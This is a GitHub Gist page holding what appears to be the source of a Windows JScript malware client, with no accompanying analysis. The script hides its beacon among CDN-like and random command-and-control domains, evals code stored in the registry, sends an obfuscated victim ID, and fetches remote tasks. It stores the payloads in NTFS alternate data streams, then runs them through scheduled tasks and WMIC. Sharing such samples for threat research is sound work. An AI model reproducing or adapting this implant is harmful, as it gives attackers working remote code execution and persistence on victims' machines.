-
-
Save JohnHammond/4f51eafa14408599ec8de7aa7aa15d13 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var client_config = { | |
COMMAND_C2 : ['http://redirector.gvt1.com','http://onecs-live.azureedge.net','http://ipm-provider.ff.avast.com','http://tauhutxiga.com','http://monsuperentrepreneur.com','http://tangocation.com','http://e4a24fb0e.com','http://f78efaf43b.com'], | |
SOFT_SIG : 'mad24', | |
CLIENT_ID : 'E669F102FDFB9C8F2E538C0A8CA3CC29', | |
C2_REQUEST_SLEEP : 20, | |
C2_FAIL_SLEEP : 1, | |
C2_FAIL_COUNT : 3, | |
C2_OB_KEY : 'JxTRG4mY', | |
SOFT_VERSION : 30, | |
C2_COMMAND_PREFIX : 'api.aspx', | |
C2_USE_IEXPLORE : false | |
} | |
var CLIENT_IMPORT_ENV = true; | |
var Client = {}; | |
Client.CoMainObject = new ActiveXObject('WScript.Shell'); | |
Client.LoadLibraryReg = function(){ | |
return Client.CoMainObject.RegRead("HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\WebLib32"); | |
} | |
Client.LibraryLoadContext = function(){ | |
eval(Client.LoadLibraryReg()); | |
Client.Windows = Windows; | |
Client.GlobalStrings = GlobalStrings; | |
Client.DataTools = DataTools; | |
Client.ObjectProducer = ObjectProducer; | |
Client.Http = Http; | |
Client.Loader = Loader; | |
Client.debug = debug; | |
} | |
Client.GetWorkerEndpoint = function(){ | |
var nonce = Client.DataTools.Random.String(12); | |
var uid = Client.Loader.GetUid(); | |
var sessionKey = nonce + client_config.C2_OB_KEY; | |
var encodedId = Client.DataTools.RotString(uid, Client.DataTools.DeriveKey(sessionKey), 0); | |
encodedId = Base64Encode(encodedId); | |
encodedId = encodeURIComponent(encodedId); | |
return client_config.C2_COMMAND_PREFIX + "?dx11diag=" + encodedId + "&remote=" + Client.DataTools.Random.String(41) + "&g=" + nonce + "&cdn=281"; | |
} | |
Client.PrepareExectionTask = function(taskName){ | |
var currentTime = new Date(), | |
hours = currentTime.getHours(), | |
minutes = currentTime.getMinutes(); | |
hours = hours < 10 ? "0" + hours.toString() : hours; | |
minutes = (minutes + 3) < 10 ? "0" + (minutes + 1).toString() : (minutes + 1); | |
var time = hours + ":" + minutes; | |
var path = Client.GlobalStrings.NTFILE_PATH.concat(":").concat(taskName); | |
var execCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC, "path=".concat(path).concat("&q=w")); | |
var taskCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.TASK_CREATE, "name=SoundIndex_".concat(taskName).concat("&command=").concat(execCommand).concat("&time=").concat(time)) | |
Client.Windows.Execute(taskCommand); | |
} | |
Client.ExecutePlugin = function(pluginId){ | |
var hostPath = Client.Windows.GetEnv("%temp%").concat("\\").concat(Client.Loader.GetUid()).concat(".bin"); | |
var command = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC_ARGS, "path=".concat(hostPath).concat("&args=").concat(pluginId)); | |
Client.Windows.Execute(command); | |
} | |
Client.GetTask = function(){ | |
for(var i = 0; i < client_config.COMMAND_C2.length; i++){ | |
var response = Client.Http.Request(client_config.COMMAND_C2[i].concat("/").concat(Client.GetWorkerEndpoint())); | |
response = Client.DataTools.RotString(response, Client.DataTools.DeriveKey(Client.Loader.GetUid().concat(client_config.C2_OB_KEY))); | |
if(response.indexOf("--TASK") !== -1){ | |
var executionTask = response.replace('--TASK--', '').split('--')[1]; | |
var taskName = response.split('--')[2]; | |
Client.PrepareExectionTask(taskName); | |
Client.Windows.WriteDataStreamBytes(Client.GlobalStrings.NTFILE_PATH, taskName, Base64bytes(executionTask)); | |
return; | |
} | |
if(response.indexOf('--PLUGIN') !== -1){ | |
var plugin = response.replace('--PLUGIN--', ''); | |
Client.ExecutePlugin(plugin); | |
return; | |
} | |
} | |
} | |
function Base64bytes(string){ | |
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument"); | |
var element = XmlDOM.createElement("Base64Data"); | |
element.dataType = "bin.base64"; | |
element.text = string; | |
var stream = WScript.CreateObject("ADODB.Stream"); | |
stream.Type = 1; | |
stream.Open(); | |
stream.Write(element.nodeTypedValue); | |
return stream; | |
} | |
function StringToBinary(string){ | |
var BinaryStream = new ActiveXObject("ADODB.Stream"); | |
BinaryStream.Type = 2; | |
BinaryStream.CharSet = "ascii"; | |
BinaryStream.Open(); | |
BinaryStream.WriteText(string); | |
BinaryStream.Position = 0; | |
BinaryStream.Type = 1; | |
BinaryStream.Position = 0; | |
return BinaryStream.Read(); | |
} | |
function Base64Encode(string) { | |
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument"); | |
var element = XmlDOM.createElement("Base64Data"); | |
element.dataType = "bin.base64"; | |
element.nodeTypedValue = StringToBinary(string); | |
return element.text.replace(/\n/g, "").replace(/\/\//g, ""); | |
} | |
Client.LibraryLoadContext(); | |
WScript.Sleep(1 * 60 * 1000); | |
Client.GetTask(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment